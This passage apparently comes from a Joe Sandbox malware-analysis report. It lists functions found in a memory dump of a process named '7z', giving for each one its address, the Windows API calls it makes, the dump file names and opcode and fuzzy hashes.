Opcode Fuzzy Hash: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
Instruction Fuzzy Hash: ACF0126321494480CA30DF25E95535E6320E7C9BF8F588321EE6D477E9DF28C586C710

Function 009A4035 Relevance: 2.6, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A404D
memmove.MSVCRT ref: 009A4087

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memmove$ExceptionThrowfreemalloc
String ID:
API String ID: 1415420288-0
Opcode ID: 96e44e9e5a32ed725eb072e1cfbeb8874b8d10a423f6c5ce45c1c81385b624aa
Instruction ID: d2f677fd6b7d669b651b77f854037764ec8d296c06247196e9c4cce1af70138d
Opcode Fuzzy Hash: 96e44e9e5a32ed725eb072e1cfbeb8874b8d10a423f6c5ce45c1c81385b624aa
Instruction Fuzzy Hash: EE3192672196C1AACA71EF18E5943EEB760F3D2340F408422D79D43B69EF38D659CB00

Function 009A4054 Relevance: 2.6, APIs: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A4065
memmove.MSVCRT ref: 009A4087

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memmove$ExceptionThrowfreemalloc
String ID:
API String ID: 1415420288-0
Opcode ID: 17819045fa4f71224e77d6b47d31bebb38c9a9f9600a532a75b3572cd8e30e53
Instruction ID: 79deaabdafe5ae6dc345b334b3ffbe3ada750178bab2eb1cab8e5c23404dc33d
Opcode Fuzzy Hash: 17819045fa4f71224e77d6b47d31bebb38c9a9f9600a532a75b3572cd8e30e53
Instruction Fuzzy Hash: 421190A32196C592CE31EB15F4953EEA311E7D2390F8084269B9D47AA5EB7CC689CB00

Function 00999A34 Relevance: 2.5, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00999A84
free.MSVCRT ref: 00999A95

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
Instruction ID: 214c359f7e27b2f733f077cab083f6c2bc8325867af9ea1bdf1376eb75ff1982
Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
Instruction Fuzzy Hash: 7CF08123302A9086DE20AB2EE84026D6714FB86FB1F588324DF7D17B91CF24C847C300

Function 009BC7D4 Relevance: 2.5, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

memmove.MSVCRT ref: 009BC815
free.MSVCRT ref: 009BC81D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrowfreemallocmemmove
String ID:
API String ID: 1097815484-0
Opcode ID: 81a948d7c8275a5e02843b536d61aee36f4bb894a1cd073c72687d460436fb1b
Instruction ID: be6baad624b447047fd55c48dbc70692e51eca11ed04a10c23c825dd6af469f1
Opcode Fuzzy Hash: 81a948d7c8275a5e02843b536d61aee36f4bb894a1cd073c72687d460436fb1b
Instruction Fuzzy Hash: 9401A477702588CBCB14DF26D4615ACB764E788FA9B08C129DF094B358DE34DC86CBA0

Function 009B0A1C Relevance: 2.5, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 009B0A42
LeaveCriticalSection.KERNEL32 ref: 009B0A73

Part of subcall function 009BB480: GetTickCount.KERNEL32 ref: 009BB49E
Part of subcall function 009BB480: strcmp.MSVCRT ref: 009BB4E3
Part of subcall function 009BB480: wcscmp.MSVCRT ref: 009BB502
Part of subcall function 009BB480: strcmp.MSVCRT ref: 009BB568

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
String ID:
API String ID: 3267814326-0
Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
Instruction ID: 5fcc57a4dd6f52a124ef3a7b58a44de8285ee106ea5c45a139cfdfeb2f7cb0bc
Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
Instruction Fuzzy Hash: 8CF05EA2264A5082E7209B24ED447997360E744BB5F144735DEBD476E5CF38858AC314

Function 00972568 Relevance: 2.5, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 00973274: memmove.MSVCRT ref: 009732AC

free.MSVCRT ref: 009725B5
free.MSVCRT ref: 009725C0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
Instruction ID: 554f980734f03c0d39a60298e0653c5690db0cd4c4c080704dc273480d840ae7
Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
Instruction Fuzzy Hash: 61E0656326864091CE30EB21E45115EA720FBC67F4B84A311F6BF577F9DE28C686CB10

Function 00972130 Relevance: 2.5, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00972134
_CxxThrowException.MSVCRT ref: 0097214F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrowmalloc
String ID:
API String ID: 2436765578-0
Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
Instruction ID: cd4c51822260e3001ac616b7d8a1b2f4ceedf246fee2a91b9498f84004d92fef
Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
Instruction Fuzzy Hash: 32D01251B2B784D1DE04A765A8913546760A7A87A0FD05056F24E01726DA5CC19F8701

Function 0098251C Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
Instruction ID: a51ac702f48b7950af64d3ff8bbabac7dd0cb32c6707f116fe232e01ae19a586
Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
Instruction Fuzzy Hash: 5D5148B2248AC096CB62DF35D4402ED3B65F389F98FA94136DE9A4B719EF35C885C710

Function 009986E0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SysStringByteLen.OLEAUT32 ref: 00998744

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ByteString
String ID:
API String ID: 4236320881-0
Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
Instruction ID: 0a1f97012e276e21f4fc005c8b8745c08ae671e604015aa4cb95adc1c44089e6
Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
Instruction Fuzzy Hash: 6911E51620878182EB208B5CE44036B63A4E7857E4F648324EFDA977E4EF3CCD85C705

Function 00978C98 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00978A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00978E1D), ref: 00978A99
Part of subcall function 00978A60: GetLastError.KERNEL32(?,?,00000003,?,00978E1D), ref: 00978AA6

SetEndOfFile.KERNELBASE ref: 00978CC7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: File$ErrorLastPointer
String ID:
API String ID: 841452515-0
Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
Instruction ID: 42ed7d3445f28a1ed28829aa0a36b1de84be7ad676284c6db89679680406daa0
Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
Instruction Fuzzy Hash: BAE02613341894D2E7219BA5A98966B8318BB447E0F4CC031AA8D43B488E698CDA8720

Function 009764D4 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00976464: FreeLibrary.KERNELBASE(?,?,?,009764E7), ref: 00976475

LoadLibraryExW.KERNELBASE ref: 009764F4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: Library$FreeLoad
String ID:
API String ID: 534179979-0
Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
Instruction ID: a231ddf5fa6551f86964f586a55fcfb556b175bf4124508176517dd8c27f828f
Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
Instruction Fuzzy Hash: 93D02E12700A2082EE102BBABA813A803182F06BE0E88C430EE0D03321DE280CEBA300

Function 00978BF0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00978C1F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
Instruction ID: 5e6a3ed31fe405f98c6bdd920360712a321372d34f0ef9ee39c533b3599f0b8f
Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
Instruction Fuzzy Hash: 56E0467A228640CBEB40CF64E400B4AB3A0F388B24F004115DE8A83B54CBBCC044CF40

Function 00976464 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,?,009764E7), ref: 00976475

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
Instruction ID: 0af3b99ee2105b22478fc079c2f723d730331cc37fb24f89ba7607f387790fd4
Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
Instruction Fuzzy Hash: DDD012A3702905C5FF154FA6EC6433533586B58F94F5C9010CE194A251EB2988958764

Function 00978AF4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 00978B16

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
Instruction ID: f5d8e23be3da4e2797f14a4cbd5e7c534c9a43b3836a91d7eba4365a47ae0c90
Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
Instruction Fuzzy Hash: E1D05E76618684C7E7008F70E45575AF764F388B64F480004EE8807774CBBCC199CF00

Function 009726A0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009726C1

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs
String ID:
API String ID: 1795875747-0
Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
Instruction ID: 4dde336b20b3cf0fc75543e42feb30cf60b5172ec2907a6a3cf899afec77e140
Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
Instruction Fuzzy Hash: B1D0A9D2710B0882CE109B2AE8143692321BB88BC8F088021DE9E0B318EA2CC2098B00

Function 0097794C Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 0097795E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
Instruction ID: 5a158c72c3d0313823bd25a5dd729eadf1641422a96238ee056b61aa98edc1f0
Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
Instruction Fuzzy Hash: 47D0C77660A945C1DB211FB9984036463559B94F74F184310CAB4493E0DF2584968711

Function 00978BB0 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE ref: 00978BB7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
Instruction ID: e7c8b01192ccd532cf3ddfe55ee24e8f51e8c2afbe1de764bf77678a0f3f8636
Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
Instruction Fuzzy Hash: 6BB09230B12400C2CB0C6726ECA231C23606788B21FE14829C50BD5650CE1C85EA4700

Function 009A3D58 Relevance: 1.3, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009A3E2A

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorExceptionLastThrowmalloc
String ID:
API String ID: 2114622545-0
Opcode ID: ac085397a568cd8d14ceeec2df6ba23388e6ed1d835e247545a2bb9031c05b64
Instruction ID: a1ada46f9997dcd9f251bd337bbb8e2ef5269cd03060694753caba63ee91ac06
Opcode Fuzzy Hash: ac085397a568cd8d14ceeec2df6ba23388e6ed1d835e247545a2bb9031c05b64
Instruction Fuzzy Hash: 6B31A033205B4086DB159F25D584369B3A5FB86FD0F688524AF5E077A4DF38C955C380

Function 0099373C Relevance: 1.3, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009937FB

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
Instruction ID: 0e2b89b8ed37cbe556acdc1da323f4d2fe7d9647e535b4d00a5e399b1887ed20
Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
Instruction Fuzzy Hash: CE2128737042409BCF24DF5EB80065A7798F785BE4F249224FE6A87784EB38C942C740

Function 0097C90C Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0097C995

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
Instruction ID: 13b94211159f899ddfc99b4845554ff28d9782637fc4c91797fcf7ece894f289
Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
Instruction Fuzzy Hash: 721159E3715650D7CBB08F6CE450368B254F740780B64C83EDBCE9BA10EB6ACC829301

Function 009A3EE0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 0099419C: free.MSVCRT ref: 009941B9
Part of subcall function 0099419C: free.MSVCRT ref: 009941C5
Part of subcall function 0099419C: free.MSVCRT ref: 009941D1
Part of subcall function 0099419C: free.MSVCRT ref: 009941DD
Part of subcall function 0099419C: free.MSVCRT ref: 009941E6
Part of subcall function 0099419C: free.MSVCRT ref: 009941EF
Part of subcall function 0099419C: free.MSVCRT ref: 009941F8

free.MSVCRT ref: 009A3F45

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
Instruction ID: 67c30614a9e18dd1c864cb81911bf730c27f054f8618fb2720fe2bbe8e28eaa4
Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
Instruction Fuzzy Hash: 1D014C73A24390CADB219F1DC18116DBB24F759FE83689117EB4907760E732C883C7A1

Function 00978624 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009786A9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

